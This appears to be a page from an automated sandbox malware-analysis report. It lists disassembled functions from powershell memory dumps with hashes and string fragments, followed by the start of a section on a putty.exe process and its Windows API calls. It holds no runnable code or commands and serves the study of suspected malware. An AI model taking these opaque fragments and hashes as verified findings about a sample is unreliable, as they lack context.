Function 00007FFAAAF55F80 Relevance: 3.8, Strings: 2, Instructions: 1306
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 00007FFAAAF5B794
hM_H, xrefs: 00007FFAAAF5BC6D

Memory Dump Source

Source File: 0000000D.00000002.1763286532.00007FFAAAF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAAF50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffaaaf50000_powershell.jbxd

Similarity

API ID:
String ID: d$hM_H
API String ID: 0-3574738029
Opcode ID: 2d28bf84fb763855abecce0c2a54952be156d4d20c4d73ed1de0d4047de46c86
Instruction ID: 79863c76e0a755c2ecbb4b15b9e770b3043455cf618dce37a9d55a4d7e132410
Opcode Fuzzy Hash: 2d28bf84fb763855abecce0c2a54952be156d4d20c4d73ed1de0d4047de46c86
Instruction Fuzzy Hash: A7822471A19E4ACFE75DDB28C455AB977E1FF96300B1481FEC04EC7292EE24A8078790

Function 00007FFAAAF5D2F8 Relevance: 2.9, Strings: 2, Instructions: 407
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

pM_^, xrefs: 00007FFAAAF5D401
oM_^, xrefs: 00007FFAAAF5D501

Memory Dump Source

Source File: 0000000D.00000002.1763286532.00007FFAAAF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAAF50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffaaaf50000_powershell.jbxd

Similarity

API ID:
String ID: oM_^$pM_^
API String ID: 0-2728294301
Opcode ID: d54a14f5dfc08ee3e2eb3daad3465e5ef345cac3c6fd3d63dbfe3a89951ba425
Instruction ID: 8f4f6ad4a45c6931ab649b7219ec2ac48e9238960cd8b2e825bf235aaac63dee
Opcode Fuzzy Hash: d54a14f5dfc08ee3e2eb3daad3465e5ef345cac3c6fd3d63dbfe3a89951ba425
Instruction Fuzzy Hash: 3EA1385BB0B92AA6E204B67DF8414FD7B84EF9227770847F7D28CC9083ED09644B42E1

Function 00007FFAAAF5BA99 Relevance: 1.8, Strings: 1, Instructions: 539
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

hM_H, xrefs: 00007FFAAAF5BC6D

Memory Dump Source

Source File: 0000000D.00000002.1763286532.00007FFAAAF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAAF50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffaaaf50000_powershell.jbxd

Similarity

API ID:
String ID: hM_H
API String ID: 0-3803223642
Opcode ID: b69d255e62a35379a6b5e65743d2ed3e8f35c88d3cc11bd7c4e3aed0ad28c09f
Instruction ID: f4719812477d321fd2f2f45b71e3eb7c27519877022305425ae9b5ab1d0ea311
Opcode Fuzzy Hash: b69d255e62a35379a6b5e65743d2ed3e8f35c88d3cc11bd7c4e3aed0ad28c09f
Instruction Fuzzy Hash: 25F11871A19E4ACFE79DDB388415ABD77D1FF96340B0481FED04EC7292EE2498068791

Function 00007FFAAB023880 Relevance: 1.8, Strings: 1, Instructions: 507
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

K_H, xrefs: 00007FFAAB023F4F

Memory Dump Source

Source File: 0000000D.00000002.1764897284.00007FFAAB020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffaab020000_powershell.jbxd

Similarity

API ID:
String ID: K_H
API String ID: 0-313846638
Opcode ID: 5b2d51517aae8e8f510ac754a213bf8164b487a5596f0b0cc6e988b56ff46e49
Instruction ID: 8e5b36b3e2838a760d27853ff10bb7c7657758daca834bb3d4aa85d1ffa914a1
Opcode Fuzzy Hash: 5b2d51517aae8e8f510ac754a213bf8164b487a5596f0b0cc6e988b56ff46e49
Instruction Fuzzy Hash: 06E15A62A0EB868FE7999B2898556747BE1FF87250B0841FED14DC71E3DD28AC1D8381

Function 00007FFAAAF5C6F9 Relevance: 1.7, APIs: 1, Instructions: 231
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000D.00000002.1763286532.00007FFAAAF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAAF50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffaaaf50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1913b408461e8b9634ac7aee065635242c30e8c1e49962c6644a9f71cfc879b
Instruction ID: 087f6b9b16fe20c0142340973417e7e674489cf064e85dadddfde4e369973e36
Opcode Fuzzy Hash: d1913b408461e8b9634ac7aee065635242c30e8c1e49962c6644a9f71cfc879b
Instruction Fuzzy Hash: 4861247190CA498FD759DB6C985A6BD7BE0FF59311F0442BEE04ED3292DF24A8068781

Function 00007FFAAB023D31 Relevance: 1.7, Strings: 1, Instructions: 458
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

K_H, xrefs: 00007FFAAB023F4F

Memory Dump Source

Source File: 0000000D.00000002.1764897284.00007FFAAB020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffaab020000_powershell.jbxd

Similarity

API ID:
String ID: K_H
API String ID: 0-313846638
Opcode ID: dd283df93c8d29f80b482ca2e157cfa9bc8e1a1401c51409c7683fbcb178c376
Instruction ID: c879ecd0a85e28dfe4cfe11b27491731fa74e10ec59a34e13c68f5073ebb1c93
Opcode Fuzzy Hash: dd283df93c8d29f80b482ca2e157cfa9bc8e1a1401c51409c7683fbcb178c376
Instruction Fuzzy Hash: AAD13872A0DB498FEB98DB189455AB87BE1FF56350B0441BAD20DC71E2DA38EC5D8380

Function 00007FFAAAF5C809 Relevance: 1.6, APIs: 1, Instructions: 131
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32 ref: 00007FFAAAF5C8CE

Memory Dump Source

Source File: 0000000D.00000002.1763286532.00007FFAAAF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAAF50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffaaaf50000_powershell.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 12202e01fb807c67ee2b0de07600f4cdee41ba9e488cc9a751872bd65d325710
Instruction ID: a299f809ef76c795570fd8b2ba10a717a12d4cd1e72b073569dfb34f9911bed5
Opcode Fuzzy Hash: 12202e01fb807c67ee2b0de07600f4cdee41ba9e488cc9a751872bd65d325710
Instruction Fuzzy Hash: DD31B37190CA5C9FDB58EF5CD845AE97BE0FB69311F04422EE04ED3251DB71A8068BC1

Function 00007FFAAB023D64 Relevance: 1.6, Strings: 1, Instructions: 316
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

K_H, xrefs: 00007FFAAB023F4F

Memory Dump Source

Source File: 0000000D.00000002.1764897284.00007FFAAB020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffaab020000_powershell.jbxd

Similarity

API ID:
String ID: K_H
API String ID: 0-313846638
Opcode ID: b58a537c654b31a1a5818434041ce17184637d17afa62ecd9bd09292ebb5a608
Instruction ID: 7a5bca760417596225016a4079a322be07c85c4a0b9245346aebffb5005ec1e0
Opcode Fuzzy Hash: b58a537c654b31a1a5818434041ce17184637d17afa62ecd9bd09292ebb5a608
Instruction Fuzzy Hash: 51A11572A0DB4A8FEB94DB1894956787BE1FF56340F0881BAD60DC71E2D938EC5D8780

Function 00007FFAAB0205F4 Relevance: .4, Instructions: 428
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000D.00000002.1764897284.00007FFAAB020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffaab020000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a915978bd3419865315c7d74995d2d4eaadb40f69644baf3b8cb2ecc349acd9c
Instruction ID: ef9c2327215835b8defe06463d2afeecf401172b7f56c8e3d4bd43d86e5872b3
Opcode Fuzzy Hash: a915978bd3419865315c7d74995d2d4eaadb40f69644baf3b8cb2ecc349acd9c
Instruction Fuzzy Hash: F0C15862E0EB898FE399972898161757BD1EF97250B0881FED58DC71A3FD18AC1D83C1

Function 00007FFAAB02A048 Relevance: .4, Instructions: 411
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000D.00000002.1764897284.00007FFAAB020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffaab020000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26993e7a2bd53b496a6e78be0b48fc88ccd69c9cd9edc18dc596329b57ddfaea
Instruction ID: f21cad8fd927c7d48159557f9a16d62038387d66701a951f52fed47212dbfee4
Opcode Fuzzy Hash: 26993e7a2bd53b496a6e78be0b48fc88ccd69c9cd9edc18dc596329b57ddfaea
Instruction Fuzzy Hash: 4CC168B291EAC98FEB959B6888055B97BE1FF46350B0440FAE14DC71E3DE18A81DC391

Function 00007FFAAB023679 Relevance: .3, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1764897284.00007FFAAB020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffaab020000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec5a973c1b51cdcb1abebf7d35faadba2a9e9bfada12619e65db03e09fe3630d
Instruction ID: edc8670c2677aab0130f22bcd4f8b8b27fdd199191ccf420f5cb05036811c54c
Opcode Fuzzy Hash: ec5a973c1b51cdcb1abebf7d35faadba2a9e9bfada12619e65db03e09fe3630d
Instruction Fuzzy Hash: 3F814772A0DB898FEBA59B6888555B57BE1FF86250B0881FBD14DC71A3DD28DC1DC380

Function 00007FFAAB02A09D Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1764897284.00007FFAAB020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffaab020000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1024a96cf403f0e90cb9e56d1fdf5ed0b162cd99c0d85230f2cd5ddfa7617cfd
Instruction ID: 6b4102f2e1eaf8d3755f327c9f9c0b3b66d8ba556d95f4517352f2d6a43de474
Opcode Fuzzy Hash: 1024a96cf403f0e90cb9e56d1fdf5ed0b162cd99c0d85230f2cd5ddfa7617cfd
Instruction Fuzzy Hash: FE6117A2D1FBC68FEB95976888556386AD1FF46390B4840BAD14DC71E3DD1CEC1D8381

Function 00007FFAAB02F08A Relevance: .2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1764897284.00007FFAAB020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffaab020000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3edad6ee977f4192df865fe0bcd7f6bfa12721c04fa753dfd27e2b7be4ec7202
Instruction ID: fee43cf8c16ae24ab32b117ac4c00355848a937855e02c429a313a7c31c57b88
Opcode Fuzzy Hash: 3edad6ee977f4192df865fe0bcd7f6bfa12721c04fa753dfd27e2b7be4ec7202
Instruction Fuzzy Hash: 81513A63E1EA468FE7A8977C985217477C2EF862D0B4881BAD14DC31E2DD18E81D87C1

Function 00007FFAAB0226C1 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1764897284.00007FFAAB020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffaab020000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b3ca0d2e5123219f31142f00e20d381ea2e579d3dad1019737eebe4235e7f70
Instruction ID: b2756689f8742f64f8ab98def4e60a7b883302bfa9e415915a7e0d7552a043a6
Opcode Fuzzy Hash: 4b3ca0d2e5123219f31142f00e20d381ea2e579d3dad1019737eebe4235e7f70
Instruction Fuzzy Hash: 8351E493E0EB864FE399876898652746BD1EF97250B4981FBD08CC71E3E8189C0D8391

Function 00007FFAAB02055D Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1764897284.00007FFAAB020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffaab020000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c3884468b1950dcb68feca634af501743ee82def6beeab893c8866664566843
Instruction ID: 3814d2c977c0854e3854dd5e1cf5bdd8a962b82ec5e5b690645654cdb1d92c23
Opcode Fuzzy Hash: 5c3884468b1950dcb68feca634af501743ee82def6beeab893c8866664566843
Instruction Fuzzy Hash: 9451646590F7D69FE357433868150A57FA0AF5326170A81FBD18C8A4B3EA0C585E83E2

Function 00007FFAAAE3EC64 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1762447199.00007FFAAAE3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAAE3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffaaae3d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07139822957c0701e0f684b626ea79fde43f3aaa87de82027c9a27bb3aea6600
Instruction ID: 8fc35e563986f5234da873d1168ab1c802c5750f8362973842d9879c22fa22e1
Opcode Fuzzy Hash: 07139822957c0701e0f684b626ea79fde43f3aaa87de82027c9a27bb3aea6600
Instruction Fuzzy Hash: DD41197040EBC48FE7569B3998519523FF0EF57320B1906DFD088CB5A3D629A84BC7A2

Function 00007FFAAB02362E Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1764897284.00007FFAAB020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffaab020000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f30b3ebb4203f08cfa5e806b5586588a6826eb21c1f7b42864b0b5eeb71860f
Instruction ID: e7c94bb5fec02e396b972962d23be2dace83c5d6925aa7f9663bebae010a44f5
Opcode Fuzzy Hash: 4f30b3ebb4203f08cfa5e806b5586588a6826eb21c1f7b42864b0b5eeb71860f
Instruction Fuzzy Hash: 96310492A0E7C58FE356573858151B57FE1EF83261B0880FBD18CCB0A3DD29941E8381

Function 00007FFAAB02A1D5 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1764897284.00007FFAAB020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffaab020000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3334549c644895b9430ba785b06b5ac49cc062b5f5829af820559679560475a8
Instruction ID: 5737d6151ae032ec8e9c1ad14cb700b319969908d778caac063950808a470c14
Opcode Fuzzy Hash: 3334549c644895b9430ba785b06b5ac49cc062b5f5829af820559679560475a8
Instruction Fuzzy Hash: B8213A71E0E7C68FEB95DB68C0556B87BE1EF86310B4440FAD14CC7193DD18984E8390

Function 00007FFAAB0239A0 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1764897284.00007FFAAB020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffaab020000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cf1846c4c1a70b0f21bc6b03ea2222e8290b5df4f903ba79dfcdb335a69d004
Instruction ID: 5c64b2a4cc334d365be5086c596c649bbc455750d24fd7c76462bb8ac64523b1
Opcode Fuzzy Hash: 4cf1846c4c1a70b0f21bc6b03ea2222e8290b5df4f903ba79dfcdb335a69d004
Instruction Fuzzy Hash: 6831F963E1EA478FF395976C4412278A6C2FF86291B5445F9D64DC71F2DD2CD81D4380

Function 00007FFAAB0225CD Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1764897284.00007FFAAB020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffaab020000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76b0875332d3811ee7233286e6d9c8167b52c6cc44fc46a31930014350abf0df
Instruction ID: 918bb018f97a985a8a546167a6fba7ef17fbf84c746dd886dec53a8a5a5a92f6
Opcode Fuzzy Hash: 76b0875332d3811ee7233286e6d9c8167b52c6cc44fc46a31930014350abf0df
Instruction Fuzzy Hash: 942196A3A0FB864FE39597B894161657BD0EF46260F0584FAE08DC71A3D81C5C4D8791

Function 00007FFAAB02077D Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1764897284.00007FFAAB020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffaab020000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab07706a1243a5d1f34d2f9a39953605a57a12196e0c3c5e159d5556e6f04ac8
Instruction ID: ea56654d5eb6ba347adad269fc66e943aabe5db83acba0b2dc439e099f2a5444
Opcode Fuzzy Hash: ab07706a1243a5d1f34d2f9a39953605a57a12196e0c3c5e159d5556e6f04ac8
Instruction Fuzzy Hash: 12212863E1FB854BF2A9972C641607565C1EF82690B4881BAD54CC31E3FC186C2E42C1

Function 00007FFAAB023672 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1764897284.00007FFAAB020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffaab020000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da4d43afb087845e85e4a2ae6a614b51e01e8ee54e1ff74c52d768ffe57de8d1
Instruction ID: 26ec7bca9c5187dd40040049fb00d1225c203ac6d60c690bef6f26fa42ae145f
Opcode Fuzzy Hash: da4d43afb087845e85e4a2ae6a614b51e01e8ee54e1ff74c52d768ffe57de8d1
Instruction Fuzzy Hash: AD110A56A0E7C58EE397577848216756FD5AF83261B1840FBD28DC70A3EC2D941EC381

Function 00007FFAAB0205E8 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1764897284.00007FFAAB020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffaab020000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fda8ea56bcda49d80b64e06abee200c0e37eb728d20152eac9dcdd56482f1bb
Instruction ID: d3c9234014993677c5d0e03d24f772f5340d945bd7bacba7f811624eba097224
Opcode Fuzzy Hash: 8fda8ea56bcda49d80b64e06abee200c0e37eb728d20152eac9dcdd56482f1bb
Instruction Fuzzy Hash: 1A110663E1EB954BF269A32C64160B966C1EF86660B5881FAD54CC31E3FD186C1E42C6

Function 00007FFAAB02EFFD Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1764897284.00007FFAAB020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffaab020000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 909762f585978ae733287251f65a532b639139736db304adea9846708743c1dd
Instruction ID: 1e9d76bfc78d2e13c539041214b15ad3222723a21a2798b3844723c666eb4e3c
Opcode Fuzzy Hash: 909762f585978ae733287251f65a532b639139736db304adea9846708743c1dd
Instruction Fuzzy Hash: 2FF0E533A0E3618FD75687B8A4520E4BBA0EF4B2B031440F7E189CA063D925141BCBC1

Function 00007FFAAB023878 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1764897284.00007FFAAB020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffaab020000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11bc6c72a655449416e6c2b12015c8e358b972e0d0519ac0277c880382ca4371
Instruction ID: a46676f1b64bf71a54360149712ffec253687161972c8f7f99c5eef0485e0305
Opcode Fuzzy Hash: 11bc6c72a655449416e6c2b12015c8e358b972e0d0519ac0277c880382ca4371
Instruction Fuzzy Hash: C2F02123B0DA458FF385A76C54412F992C2FFC5251B5440FAC54DC32A3EC39D85E8380

Function 00007FFAAB027E5D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1764897284.00007FFAAB020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffaab020000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ca92e64c20378674a22603f500359804d88d12a7a1ff98e7c7aa8e7a80d68c8
Instruction ID: 28012b23a2595ba0f4af09041a7d790d8df094cb5886487e2574d68eb4f8e9be
Opcode Fuzzy Hash: 8ca92e64c20378674a22603f500359804d88d12a7a1ff98e7c7aa8e7a80d68c8
Instruction Fuzzy Hash: 49F0BE73A0D504CFDB68EB5CE4468A877E4EF4A320B1040BAE25EC7573CA25EC58C791

Function 00007FFAAB028100 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1764897284.00007FFAAB020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffaab020000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 859c1c4fa3e46b00a22ee2fb7c866a8a3440350769e8720f76e10104eaf91a54
Instruction ID: 1263aad7905b2f50fa4c906f76ff5c3ec68f50f513447351fac90382bb1f0220
Opcode Fuzzy Hash: 859c1c4fa3e46b00a22ee2fb7c866a8a3440350769e8720f76e10104eaf91a54
Instruction Fuzzy Hash: 32F08233A0D6448FD758EB5CE4458A87BE4EF46361B1540F6E14DC74B3DA25EC58C780

Non-executed Functions

Function 00007FFAAAF5E318 Relevance: 4.6, Strings: 3, Instructions: 848COMMON

Download Yara Rule

Strings

EJ_H, xrefs: 00007FFAAAF8DF6E
+, xrefs: 00007FFAAAF8E442
m, xrefs: 00007FFAAAF8DCAA

Memory Dump Source

Source File: 0000000D.00000002.1763286532.00007FFAAAF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAAF50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffaaaf50000_powershell.jbxd

Similarity

API ID:
String ID: +$EJ_H$m
API String ID: 0-2551601182
Opcode ID: 6173680b11a588899d0317f5d934e44dd01967ed6aff1ad1ec7891c8be6ad2ff
Instruction ID: ff348e06b292c3c34010f4d8a0b86f1d2a2179b22f5ac2fb28f0a2079bba72c8
Opcode Fuzzy Hash: 6173680b11a588899d0317f5d934e44dd01967ed6aff1ad1ec7891c8be6ad2ff
Instruction Fuzzy Hash: AC628EB1A08A498FE798DB28D8557ADB7E5FF98300F1045FAE04DD3282DF385D828B51

Function 00007FFAAAF5EAAB Relevance: 2.0, Strings: 1, Instructions: 779COMMON

Download Yara Rule

Strings

L_I, xrefs: 00007FFAAAF801A3

Memory Dump Source

Source File: 0000000D.00000002.1763286532.00007FFAAAF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAAF50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffaaaf50000_powershell.jbxd

Similarity

API ID:
String ID: L_I
API String ID: 0-1627180413
Opcode ID: bf0b09f3a0551586314e7ed01532b73ac426af04e688a79433b20e470c1eb32e
Instruction ID: 738c3e0cc200d494642a984a920cc245163a3e1ddcaf5e9bf9d683767bd66e04
Opcode Fuzzy Hash: bf0b09f3a0551586314e7ed01532b73ac426af04e688a79433b20e470c1eb32e
Instruction Fuzzy Hash: A232D561A1DA46CBE79CA73894516BD73D2FF99310F4085BDE04EC72C2EE29A80787D1

Function 00007FFAAAF7D3E0 Relevance: 1.9, Strings: 1, Instructions: 641COMMON

Download Yara Rule

Strings

gK_H, xrefs: 00007FFAAAF7D53F

Memory Dump Source

Source File: 0000000D.00000002.1763286532.00007FFAAAF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAAF50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffaaaf50000_powershell.jbxd

Similarity

API ID:
String ID: gK_H
API String ID: 0-3193895614
Opcode ID: b23a3697bd1ec572a2e4b575f59915883a39694db3c3affaf9b45f0e4a96e79f
Instruction ID: 39727e013845a8f75513edd77ae0fa28d04859032c2a1f1647b4209df4927eeb
Opcode Fuzzy Hash: b23a3697bd1ec572a2e4b575f59915883a39694db3c3affaf9b45f0e4a96e79f
Instruction Fuzzy Hash: 54129470A1DB46CFE7B8DB28C44567AB7D1EB99310F1046BED08DC3291EE35A846C782

Function 00007FFAAAF5D0D8 Relevance: .5, Instructions: 512COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1763286532.00007FFAAAF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAAF50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffaaaf50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e81d3a072eb27d46afb2992c99b53eda755384c86bcd12737eb4916fcbbaa3c2
Instruction ID: 1b96cd2ceeff8d4171cceb14fbdbbc3d6a8fd7f1bb42ff49a4f2fe9bc2f07ed7
Opcode Fuzzy Hash: e81d3a072eb27d46afb2992c99b53eda755384c86bcd12737eb4916fcbbaa3c2
Instruction Fuzzy Hash: 93E1E761A1EF4ACFE6ED873C48511797AD2EF86210B4841FED44EC7187ED19EC4A42D2

Function 00007FFAAB0232A0 Relevance: .4, Instructions: 434COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1764897284.00007FFAAB020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffaab020000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b34e0d90680453be1df0df810110558b17d8eaf40586407e4e34c01f9b3d42f
Instruction ID: 8f598443828b8124a52fced86b93d992580225b64ce3f55ecd8e33be274db7af
Opcode Fuzzy Hash: 7b34e0d90680453be1df0df810110558b17d8eaf40586407e4e34c01f9b3d42f
Instruction Fuzzy Hash: 20C139A290E7C65FE356977898525A57FE0EF47260B0901FBD48CC71E3E81DA81E83A1

Function 00007FFAAB0210F0 Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1764897284.00007FFAAB020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffaab020000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a121c3836a180fdfb47a177dcb44368df7d3fa95c32db6e5f6167b91c7c1a973
Instruction ID: 898e5ace56f4299996b3e68e30e757b9a8d1de837926ef6bd5d23a58f66f8c33
Opcode Fuzzy Hash: a121c3836a180fdfb47a177dcb44368df7d3fa95c32db6e5f6167b91c7c1a973
Instruction Fuzzy Hash: BA41039291FB8A4FF399976888651742BD0EF67290B0940FAE54CCB1F3EC1C5C5E9391

Analysis Process: putty.exePID: 5260, Parent PID: 1836COMMON

Execution Graph

Execution Coverage:	2.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	6.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	48

Executed Functions

Function 00007FF6BB2853E3 Relevance: 100.4, APIs: 38, Strings: 19, Instructions: 618
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetMonitorInfoA.USER32 ref: 00007FF6BB2854C5
GetDesktopWindow.USER32 ref: 00007FF6BB2854DA
GetClientRect.USER32 ref: 00007FF6BB2854E8
CreateWindowExW.USER32 ref: 00007FF6BB285627
GetLastError.KERNEL32 ref: 00007FF6BB285639
MonitorFromWindow.USER32 ref: 00007FF6BB285685
GetDC.USER32 ref: 00007FF6BB2856D7
